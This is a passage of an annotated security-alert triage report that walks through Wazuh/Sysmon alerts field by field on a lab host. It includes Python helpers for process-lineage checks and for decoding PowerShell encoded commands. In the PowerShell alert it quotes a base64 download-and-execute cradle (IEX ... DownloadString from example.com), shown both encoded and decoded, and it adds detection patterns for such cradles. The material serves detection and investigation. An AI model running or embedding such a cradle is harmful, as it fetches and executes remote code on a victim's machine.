data.win.eventdata.currentDirectory:  C:\\Program Files (x86)\\ossec-agent\\
Working directory inherited from the parent. This is the Wazuh agent's install directory, so the agent's own process tree started this; the first question is whether a scheduled agent check (for example an SCA policy scan) ran at 22:35:54 UTC.

data.win.eventdata.user:  NT AUTHORITY\\SYSTEM
Account the process runs as. NT AUTHORITY\SYSTEM in session 0 is a service context, not a logged-in user.

data.win.eventdata.logonGuid:  {94294ddc-ea7f-67fe-e703-000000000000}
Sysmon's GUID for the logon session; join it to every other event from the same logon. It is identical to the previous alert's, so both commands came from the same SYSTEM session.

data.win.eventdata.logonId:  0x3e7
Windows logon session ID. 0x3e7 (999) is the well-known SYSTEM session shared by every service, so it cannot tell one service from another.

data.win.eventdata.terminalSessionId:  0
0 is the non-interactive services session, consistent with a service or agent.

data.win.eventdata.integrityLevel:  System
System, the highest integrity level, consistent with a SYSTEM service.

data.win.eventdata.hashes:  SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
Hash of the executable as Sysmon is configured to compute it (SHA256 here). Compare with a known-good copy of the same build or a reputation service to confirm it is the genuine Microsoft binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-ea88-67fe-4900-000000000e00}
processGuid of the parent. Join it to the parent's own EID 1 to walk the ancestry further up.

data.win.eventdata.parentProcessId:  3244
PID of the parent when the spawn happened.

data.win.eventdata.parentImage:  C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe
The parent is the Wazuh agent itself, strong evidence that this `net accounts` was the agent's own check (SCA or a similar scheduled scan) rather than an intruder. Confirm it against the agent's configuration and verify the wazuh-agent.exe hash before closing, because anything that replaces or injects into the agent inherits this trust.

data.win.eventdata.parentCommandLine:  \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\"
Full command line of the parent: the agent service binary with no arguments, as it normally runs.

data.win.eventdata.parentUser:  NT AUTHORITY\\SYSTEM
Account the parent runs as. Same as the child here, so no credential change at this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.
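Both net.exe alerts above point at the Wazuh agent's own process tree, and that part of the triage can be automated before a human sees the alert. The following is an added example, not SOCscribe or Wazuh code: it takes Sysmon EID 1 records in the flattened eventdata form shown above, walks the parent chain by processGuid, and separates proven agent activity (wazuh-agent.exe in the lineage) from activity that merely looks like the agent (agent install directory plus the SYSTEM logon session) and still has to be checked against the agent's schedule. The verdict names, the agent path constant and the sample events (values copied from the two alerts above) are this example's own assumptions.

```python
"""Decide whether a Sysmon EID 1 'net.exe account discovery' alert was raised by
the Wazuh agent's own activity or needs a human.  Added example, not SOCscribe
or Wazuh code: the heuristics are this example's own, and EVENTS is constructed
from the eventdata fields shown in the two alerts above."""
import ntpath
from typing import Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample: field values copied from the two alerts above.
EVENTS: List[Event] = [
    {   # rule 92039: net1.exe user guest; the parent net.exe's own EID 1 is not on the page
        "processGuid": "{94294ddc-bcca-680a-c00a-000000000e00}",
        "image": r"C:\Windows\SysWOW64\net1.exe",
        "commandLine": r"C:\WINDOWS\system32\net1 user guest",
        "currentDirectory": "C:\\Program Files (x86)\\ossec-agent\\",
        "user": r"NT AUTHORITY\SYSTEM",
        "logonId": "0x3e7",
        "parentProcessGuid": "{94294ddc-bcca-680a-be0a-000000000e00}",
        "parentImage": r"C:\Windows\SysWOW64\net.exe",
    },
    {   # rule 92031: net.exe accounts, parent wazuh-agent.exe
        "processGuid": "{94294ddc-bcca-680a-c10a-000000000e00}",
        "image": r"C:\Windows\SysWOW64\net.exe",
        "commandLine": "net.exe accounts",
        "currentDirectory": "C:\\Program Files (x86)\\ossec-agent\\",
        "user": r"NT AUTHORITY\SYSTEM",
        "logonId": "0x3e7",
        "parentProcessGuid": "{94294ddc-ea88-67fe-4900-000000000e00}",
        "parentImage": r"C:\Program Files (x86)\ossec-agent\wazuh-agent.exe",
    },
]

DISCOVERY_IMAGES = {"net.exe", "net1.exe"}
AGENT_IMAGE = "wazuh-agent.exe"
AGENT_DIR = "c:\\program files (x86)\\ossec-agent\\"   # install dir seen in the alerts (assumed constant)
SYSTEM_LOGON = "0x3e7"                                 # well-known SYSTEM logon session


def index_by_guid(events: List[Event]) -> Dict[str, Event]:
    """processGuid -> event, so parents can be looked up without PID-reuse problems."""
    return {e["processGuid"]: e for e in events}


def ancestry(event: Event, by_guid: Dict[str, Event]) -> List[str]:
    """Parent images from the nearest parent upward.  The first hop never needs the
    parent's own record because EID 1 carries parentImage; further hops do."""
    chain = [event.get("parentImage", "")]
    parent = by_guid.get(event.get("parentProcessGuid", ""))
    seen = set()
    while parent is not None and parent["processGuid"] not in seen:
        seen.add(parent["processGuid"])
        chain.append(parent.get("parentImage", ""))
        parent = by_guid.get(parent.get("parentProcessGuid", ""))
    return chain


def classify(event: Event, by_guid: Dict[str, Event]) -> Tuple[str, List[str]]:
    """Returns (verdict, reasons).  agent_self = proven by lineage;
    likely_agent_self = context matches the agent, verify its schedule;
    review = no agent indicators, a human must look."""
    if ntpath.basename(event["image"]).lower() not in DISCOVERY_IMAGES:
        return "not_discovery", []
    if any(ntpath.basename(p).lower() == AGENT_IMAGE for p in ancestry(event, by_guid)):
        return "agent_self", ["parent chain includes " + AGENT_IMAGE]
    reasons = []
    if event.get("currentDirectory", "").lower() == AGENT_DIR:
        reasons.append("working directory is the agent install directory")
    is_system = event.get("user", "").upper() == "NT AUTHORITY\\SYSTEM"
    if is_system and event.get("logonId", "").lower() == SYSTEM_LOGON:
        reasons.append("runs as SYSTEM in logon session 0x3e7")
    if len(reasons) == 2:
        return "likely_agent_self", reasons
    return "review", reasons or ["no agent indicators"]


if __name__ == "__main__":
    by_guid = index_by_guid(EVENTS)
    for ev in EVENTS:
        verdict, why = classify(ev, by_guid)
        print(f"{ev['commandLine']!r}: {verdict} ({'; '.join(why)})")
```

Run it as a script to print a verdict per event. The likely_agent_self verdict is deliberately not a close: the first alert's parent net.exe has no record on this page, so its lineage cannot be proven, and a planted binary in the agent's directory running as SYSTEM would satisfy the same context checks.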

🎯 Recommended Actions
Verify against the agent configuration: the parent is wazuh-agent.exe, so find the agent's scheduled check (SCA or a wodle) that runs `net accounts` on host Attacker and confirm its schedule matches 22:35:54 UTC.
If confirmed, suppress on lineage, not on level: tune rule 92031 to exclude parentImage wazuh-agent.exe so a real `net accounts` from cmd.exe or PowerShell still fires.
Verify the wazuh-agent.exe binary before trusting it as a parent (hash, signature, install path); anything that replaces or injects into the agent inherits this trust.
Treat this alert and the previous one as one event: same second, same working directory, same SYSTEM logon session 0x3e7.

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.092+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter. Decode the -EncodedCommand first (UTF-16LE base64); it yields a DownloadString cradle for https://example.com/test. Then establish whether the fetch happened (Sysmon EID 22 and EID 3 for PID 2176) and what started the outer PowerShell (PID 9592).

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.092+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  21
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1038550
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the record. Microsoft-Windows-Sysmon means the eventID below is a Sysmon event type, not a Security-log ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon ETW provider; filter on it when provider names are renamed or localised.

data.win.system.eventID:  1
Sysmon event type: 1 = Process Create (this alert). Pivots for the same process: 3 = Network Connection, 11 = File Create, 22 = DNS Query.

data.win.system.version:  5
Schema version of this Sysmon event type. Newer Sysmon releases add fields, so parsers should key on it rather than assume a layout.

data.win.system.level:  4
ETW level: 4 = Informational. Sysmon writes everything at this level; the severity that matters is the Wazuh rule level above.

data.win.system.task:  1
For Sysmon records the task mirrors the event ID (1 = Process Create); it adds nothing on its own.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:58.9771958Z
When the record was written to the Windows event log, here about 5 s after the process started (see eventdata.utcTime, which is the time to put on the timeline). The Wazuh timestamp above is later still because it marks manager processing.

data.win.system.eventRecordID:  282377
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported; it is 3712 in every Sysmon alert from this host. The process under investigation is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Pull the neighbouring records with Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' on the host.

data.win.system.computer:  Attacker
Hostname Windows stamped on the record. Should equal agent.name; a mismatch means a renamed host or an agent reporting for another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:53.808 ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} ProcessId: 2176 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00} ParentProcessId: 9592 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
Rendered event text with every eventdata field in one string. Fine for a quick read or a copy-and-paste search; use the parsed eventdata fields for anything programmatic.

data.win.eventdata.utcTime:  2025-04-24 22:35:53.808
When Sysmon observed the process start, in UTC. Use this, not the Wazuh timestamp, on the timeline; here the Wazuh timestamp is about a minute later because of collection delay.

data.win.eventdata.processGuid:  {94294ddc-bcc9-680a-b70a-000000000e00}
Sysmon's unique ID for this process instance. Unlike the PID it is never reused, so it is the join key to this process's later EID 3 (network), EID 11 (file) and EID 22 (DNS) records and to its children's parentProcessGuid.

data.win.eventdata.processId:  2176
Windows PID of the new process. PIDs are recycled, so pair it with processGuid or utcTime when searching.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Full path of the new executable: 64-bit Windows PowerShell 5.1 from its normal location. Confirm it is the genuine binary with the hash below before trusting the path.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
Version from the binary's resource block; 10.0.26100 is the Windows 11 24H2 / Server 2025 build line. A system binary whose version does not match the host's build is suspect.

data.win.eventdata.description:  Windows PowerShell
Description string from the PE version resource. Sysmon copies it verbatim and does not verify it, so treat it as a hint, never as proof of what the file is.

data.win.eventdata.product:  Microsoft® Windows® Operating System
Product string from the PE version resource; same caveat, anyone can set it.

data.win.eventdata.company:  Microsoft Corporation
Company string from the PE version resource; same caveat. Authenticode signature status is not in this event, check it separately.

data.win.eventdata.originalFileName:  PowerShell.EXE
Internal file name compiled into the binary. When it differs from the file name in image the binary was renamed, a classic trick for hiding a LOLBin. Here they match (case aside).

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Exact command line. -EncodedCommand carries base64 of UTF-16LE text, so decode with that encoding (a UTF-8 decode shows interleaved nulls). This one decodes to IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): a download cradle that fetches a script over HTTPS and runs it in memory without writing it to disk. -NoLogo and -NoProfile are its usual companions.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
Working directory inherited from the parent: the user's profile root, i.e. an interactive session rather than a service.

data.win.eventdata.user:  Attacker\\Attcker1
Account the process runs as. The domain part equals the hostname (Attacker), so Attcker1 is a local account, not a domain one.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
Sysmon's GUID for the logon session; join it to every other event from the same logon.

data.win.eventdata.logonId:  0x26584
Windows logon session ID. Search Security Event ID 4624 for Logon ID 0x26584 to see when and how Attcker1 logged on (logon type, source address).

data.win.eventdata.terminalSessionId:  1
1 is the first interactive desktop session: a person, or something driving the desktop, was logged on.

data.win.eventdata.integrityLevel:  Medium
Medium is a normal, non-elevated user process; no UAC bypass had happened at this point.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
Hash of the executable as Sysmon is configured to compute it (SHA256 here). Compare with a known-good copy of the same build or a reputation service to confirm it is the genuine Microsoft binary.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcc6-680a-b30a-000000000e00}
processGuid of the parent. Join it to the parent's own EID 1 to walk the ancestry further up.

data.win.eventdata.parentProcessId:  9592
PID of the parent when the spawn happened.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
PowerShell spawned by PowerShell with an identical command line (see parentCommandLine), exactly the pattern the rule looks for. Pull the EID 1 for PID 9592 and its parent to find what launched the outer instance.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
Identical to the child's command line, doubled executable path included, so the outer PowerShell relaunched itself with the same encoded payload.

data.win.eventdata.parentUser:  Attacker\\Attcker1
Account the parent runs as. Same as the child here, so no credential change at this hop.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.
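The rule tells you the command was base64-encoded but not what it says. The following is an added example, not SOCscribe or Wazuh code, of the decode an analyst otherwise does by hand: it finds the -EncodedCommand switch (any prefix PowerShell accepts), decodes the argument as UTF-16LE, and scores the plaintext for the three parts of a download cradle. COMMAND_LINE is copied from the commandLine field above; the indicator patterns and the result field names are this example's own.

```python
"""Decode a PowerShell -EncodedCommand and score the result for download-cradle
indicators.  Added example, not SOCscribe or Wazuh code: the indicator list is
this example's own, and COMMAND_LINE is copied from the commandLine field above."""
import base64
import binascii
import re
from typing import Dict, Optional

# Copied from data.win.eventdata.commandLine in the alert above.
COMMAND_LINE = (
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" '
    "-NoLogo -NoProfile -EncodedCommand "
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA"
)

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc ...) plus the
# special-cased -ec, so match all of them, not just the full switch name.
_PREFIXES = "|".join("encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)) + "|ec"
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:" + _PREFIXES + r")\s+([A-Za-z0-9+/=]+)")

# Pieces that, together, make a download-and-execute cradle.
INDICATORS: Dict[str, "re.Pattern"] = {
    "invoke_expression": re.compile(r"(?i)\bIEX\b|Invoke-Expression"),
    "web_client": re.compile(r"(?i)Net\.WebClient|Invoke-WebRequest|Invoke-RestMethod"),
    "download": re.compile(r"(?i)Download(?:String|File|Data)"),
}
URL = re.compile(r"(?i)https?://[^\s'\")]+")


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Returns the decoded script, or None if there is no -EncodedCommand or the
    argument does not decode.  PowerShell encodes UTF-16LE, not UTF-8."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def analyze(command_line: str) -> Dict[str, object]:
    """Score the decoded script (or the raw command line when nothing is encoded)."""
    decoded = decode_encoded_command(command_line)
    text = decoded if decoded is not None else command_line
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    urls = URL.findall(text)
    return {
        "encoded": decoded is not None,
        "decoded": decoded,
        "indicators": hits,
        "urls": urls,
        # execution primitive + a fetch + a URL: that is a cradle
        "is_cradle": "invoke_expression" in hits and "download" in hits and bool(urls),
    }


if __name__ == "__main__":
    result = analyze(COMMAND_LINE)
    print(result["decoded"])
    print(result["indicators"], result["urls"], "cradle:", result["is_cradle"])
```

The decoded text, IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'), is the classic in-memory download-and-execute cradle. The scoring deliberately needs all three parts (an execution primitive, a fetch and a URL): a command that only fetches or only evaluates shows up in indicators but not as is_cradle, so the analyst can see why it scored the way it did.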

🎯 Recommended Actions
Decode the -EncodedCommand as UTF-16LE base64. It reads IEX(New-Object Net.WebClient).DownloadString('https://example.com/test'): fetch a script over HTTPS and run it in memory.
Establish whether the fetch happened: Sysmon EID 22 (DNS query) and EID 3 (network connection) for ProcessGuid {94294ddc-bcc9-680a-b70a-000000000e00} / PID 2176, and PowerShell Script Block Logging (Event ID 4104) on host Attacker for the content of the downloaded script.
Walk up the chain: PID 9592 (ProcessGuid {94294ddc-bcc6-680a-b30a-000000000e00}) has the same command line, so something above it supplied the payload; pull its EID 1 and its parent's.
Scope the session: Attcker1, interactive session 1, Logon ID 0x26584. Find the Security 4624 for that logon and every other process started in it.
Contain host Attacker (192.168.6.131) until the network evidence is in. Note that example.com is a reserved documentation domain and the host and user names read like a lab, so also confirm whether this was a sanctioned test; the 21 earlier hits of this rule should show the same pattern if it was.

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.173+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer. Confirm the target file is PowerShell's own __PSScriptPolicyTest_ start-up probe (it is) and fold this alert into the encoded-command case for ProcessGuid {94294ddc-bcc9-680a-b70a-000000000e00}; look for other EID 11 writes from that process instead.

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.173+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human-readable summary of why the rule fired. Read it first, but read it critically: here the "executable file" is a .ps1 policy-test file that PowerShell writes itself (see targetFilename below).

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs the rule maps to. T1105 here is the rule author's mapping, not evidence: this event shows a local write by powershell.exe, not a transfer from outside. The previous PowerShell alert, with its DownloadString cradle, is where ingress would actually happen.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  25
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534217.1046613
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
ETW provider that wrote the record. Microsoft-Windows-Sysmon means the eventID below is a Sysmon event type, not a Security-log ID.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
Fixed GUID of the Sysmon ETW provider; filter on it when provider names are renamed or localised.

data.win.system.eventID:  11
Sysmon event type: 11 = File Create. Pair it with the creating process's EID 1 (Process Create) through processGuid.

data.win.system.version:  2
Schema version of this Sysmon event type. Newer Sysmon releases add fields, so parsers should key on it rather than assume a layout.

data.win.system.level:  4
ETW level: 4 = Informational. Sysmon writes everything at this level; the severity that matters is the Wazuh rule level above.

data.win.system.task:  11
For Sysmon records the task mirrors the event ID (11 = File Create); it adds nothing on its own.

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:59.5779531Z
When the record was written to the Windows event log. eventdata.utcTime below is when Sysmon observed the event and is the time to put on the timeline; the Wazuh timestamp above is later still because it marks manager processing.

data.win.system.eventRecordID:  282382
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
PID of the process that wrote the record, i.e. the Sysmon service, not the process being reported; it is 3712 in every Sysmon alert from this host. The process under investigation is eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel holding the record. Pull the neighbouring records with Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational' on the host.

data.win.system.computer:  Attacker
Hostname Windows stamped on the record. Should equal agent.name; a mismatch means a renamed host or an agent reporting for another machine.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:59.551 ProcessGuid: {94294ddc-bcc9-680a-b70a-000000000e00} ProcessId: 2176 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_24a1orhe.2h5.ps1 CreationUtcTime: 2025-04-24 22:35:59.551 User: Attacker\Attcker1"
Rendered event text with every eventdata field in one string. Fine for a quick read or a copy-and-paste search; use the parsed eventdata fields for anything programmatic.

data.win.eventdata.utcTime:  2025-04-24 22:35:59.551
When Sysmon observed the file creation, in UTC: 5.7 s after the creating PowerShell started (22:35:53.808 in the previous alert).

data.win.eventdata.processGuid:  {94294ddc-bcc9-680a-b70a-000000000e00}
processGuid of the creating process, identical to the encoded-command PowerShell in the previous alert. This is the join key for folding this alert into that case.

data.win.eventdata.processId:  2176
PID of the creator: 2176, again the encoded-command PowerShell.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process that created the file: the same powershell.exe instance as the previous alert (same processGuid and PID).

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_24a1orhe.2h5.ps1
The file written. __PSScriptPolicyTest_<random>.<random>.ps1 in %TEMP% is created by PowerShell itself on start-up to test whether AppLocker/WDAC constrains script execution. It is not an attacker-dropped executable and not evidence of tool transfer; the rule matched on the Temp folder plus the .ps1 extension.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:59.551
Creation timestamp read from the file. Equal to utcTime here; if it were earlier, the creator back-dated the file (timestomping, which Sysmon reports separately as EID 2).

data.win.eventdata.user:  Attacker\\Attcker1
Account that created the file: the same Attcker1 session as the previous alert.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:57.906+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:57.906+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
